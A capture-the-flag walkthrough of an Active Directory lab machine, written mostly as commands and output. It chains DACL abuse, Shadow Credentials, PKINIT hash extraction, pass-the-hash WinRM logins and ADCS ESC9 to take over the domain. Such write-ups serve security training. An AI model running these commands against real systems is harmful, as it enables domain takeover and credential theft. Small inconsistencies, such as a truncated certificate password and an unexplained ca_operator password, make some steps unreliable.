This machine is an Active Directory environment with multiple misconfigurations: weak user credentials, DACL abuse (WriteOwner → WriteMembers), Shadow Credentials, and an ADCS ESC9 vulnerability. The final compromise is achieved by requesting a certificate with Administrator UPN and extracting the NT hash.
Target: 10.10.11.41
Initial access: judith.mader / judith09
Domain: certified.htb
Techniques: DACL abuse, targeted Kerberoast, Shadow Credentials, PKINIT, ADCS ESC9
NetExec:
$ nxc smb 10.10.11.41 -u "judith.mader" -p 'judith09' --rid-brute $ nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --users Users: Administrator Guest krbtgt judith.mader management_svc ca_operator alexander.huges harry.wilson gregory.cameron
BloodHound collection:
$ nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --bloodhound --collection ALL --dns-server 10.10.11.41 -> bloodhound.zip
enum4linux-ng:
NetBIOS: DC01 Domain: CERTIFIED DNS: certified.htb
BloodHound shows:
judith.mader -> WriteOwner -> MANAGEMENT (Group)
Take ownership of the group:
$ impacket-owneredit -action write -new-owner 'judith.mader' \ -target 'management' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41
Grant WriteMembers to yourself:
$ impacket-dacledit -action write -rights WriteMembers \ -principal 'judith.mader' \ -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' \ 'certified.htb'/'judith.mader':'judith09'
Add yourself to the group:
$ net rpc group addmem "MANAGEMENT" "judith.mader" \ -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"
Group members now:
CERTIFIED\judith.mader CERTIFIED\management_svc
MANAGEMENT has GenericWrite over management_svc.
Attempt Kerberoast:
$ sudo ntpdate 10.10.11.41 $ targetedKerberoast.py -d certified.htb -u judith.mader -p judith09 --dc-ip 10.10.11.41 -> hash obtained but not crackable
Hashcat exhausted the wordlist. No password recovered.
Add a KeyCredential to management_svc:
$ pywhisker.py -d certified.htb -u judith.mader -p judith09 \ --target management_svc --action add -> Saved PFX: GyQadAKv.pfx -> Password: DR4zJqcY6beffcceYXRQ
Obtain TGT:
$ gettgtpkinit.py certified.htb/management_svc \ -cert-pfx GyQadAKv.pfx -pfx-pass DR4zJqcY6beffcce
Extract NT hash:
$ getnthash.py certified.htb/management_svc -key-> a091c1832bcdd4677c28b5a6a1295584
This hash allows WinRM as management_svc:
$ evil-winrm -i 10.10.11.41 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'
Find templates:
$ certipy-ad find -username ca_operator@certified.htb -password ca_operator -dc-ip 10.10.11.41 -> ESC9 vulnerability identified
Update ca_operator UPN to Administrator:
$ certipy-ad account update \ -username management_svc@certified.htb \ -hashes a091c1832bcdd4677c28b5a6a1295584 \ -user ca_operator -upn Administrator
Request certificate using template CertifiedAuthentication:
$ certipy-ad req -username ca_operator@certified.htb -p ca_operator \ -ca certified-DC01-CA -template CertifiedAuthentication -debug -> administrator.pfx
Authenticate with the certificate:
$ certipy-ad auth -pfx administrator.pfx -domain certified.htb -> NT hash: 0d5b49608bbce1751f708748f67e2d34
WinRM as Administrator:
$ evil-winrm -i 10.10.11.41 -u Administrator -H '0d5b49608bbce1751f708748f67e2d34' -> root.txt
The machine chains several AD misconfigurations: DACL WriteOwner abuse, WriteMembers privilege escalation, Shadow Credentials, PKINIT authentication, and finally ADCS ESC9 to impersonate Administrator. The final certificate request provides a valid Administrator TGT and NT hash, allowing full domain compromise.